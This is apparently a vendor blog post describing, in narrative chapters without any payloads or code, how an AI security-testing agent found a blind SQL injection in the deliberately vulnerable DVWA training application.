Tales from the Trace: How Agentic AI Merges Static and Dynamic Testing
Watch XBOW autonomously combine source code analysis with dynamic testing to discover SQL injection in minutes. This episode shows AI reading code, crafting exploits, and validating vulnerabilities - the "holy grail" of application security testing in action.
Welcome to Tales from the Trace
Welcome to our first installment of "Tales from the Trace". Just like the cult TV series Tales from the Crypt, this series will reveal crafty twists, unexpected turns, and sometimes shocking discoveries. But instead of haunted houses and monsters, we'll be diving into what XBOW's AI-powered offensive security platform uncovers in application traces: surprising vulnerabilities, strange behaviors, and lessons learned along the way.
The Holy Grail: Static Meets Dynamic
Today's story demonstrates how effective it can be to combine source-code analysis with dynamic testing in an automated workflow. That combination is notoriously difficult for traditional automated scanners. With XBOW's AI capabilities, we get closer to the "holy grail" of application security testing. XBOW uses static knowledge from the code to guide dynamic attacks, while dynamic evidence confirms and validates real security gaps.
Relying only on traditional SAST solutions often leads to noisy results. False positives, dead code paths, or findings that are purely informational. On the other hand, relying only on traditional DAST tools can leave legitimate vulnerabilities undiscovered. By adding source code context to dynamic testing, XBOW dramatically improves the accuracy and likelihood of uncovering real, exploitable vulnerabilities.
This particular trace was generated while testing DVWA, a purposely vulnerable web application used for security training. For this run, I included the application's source code as part of the test configuration. Below we'll walk through the trace and show how XBOW understood the code, crafted a dynamic test, and ultimately surfaced a SQL injection vulnerability.
Chapter 1: Analyzing the Evidence
We can see that XBOW starts by unzipping and analyzing the contents of the source code that was supplied when the test was configured.
Chapter 2: Testing the Waters
Next, XBOW analyzes the normal behavior of the endpoint that we are about to test:
Chapter 3: When Simple Attacks Fail
Our AI solver then attempts a simple SQLi payload and observes whether it behaves as expected.
Chapter 4: Reading Between the Lines
When the simple attack fails, XBOW dives into the endpoint's source code to hunt for sloppy coding that hints at a smarter payload that might expose SQLi.
Chapter 5: The Smoking Gun
Ah ha! XBOW follows the code path for the endpoint it's testing and sees the problem. It then explains why the first attempt failed, and crafts a new payload tailored to exploit it.
Chapter 6: Proof of Exploitation
Success! We found a blind SQL injection vulnerability. Finally, we pass the finding to our SQLi verification tool to confirm exploitability and rule out false positives.
The Verdict
While this was a simple case, XBOW was able to test the endpoint, locate the relevant source code, and craft an exploit confirming the vulnerability in just minutes. By contrast, a human tester might spend hours or even days sifting through thousands of lines of code to achieve the same result on an enterprise application. With agentic AI combining static analysis and dynamic validation, XBOW finds these issues quickly, delivering accurate results at scale and leaving no vulnerability lurking in the shadows.
Stay tuned for the next episode of Tales from the Trace!

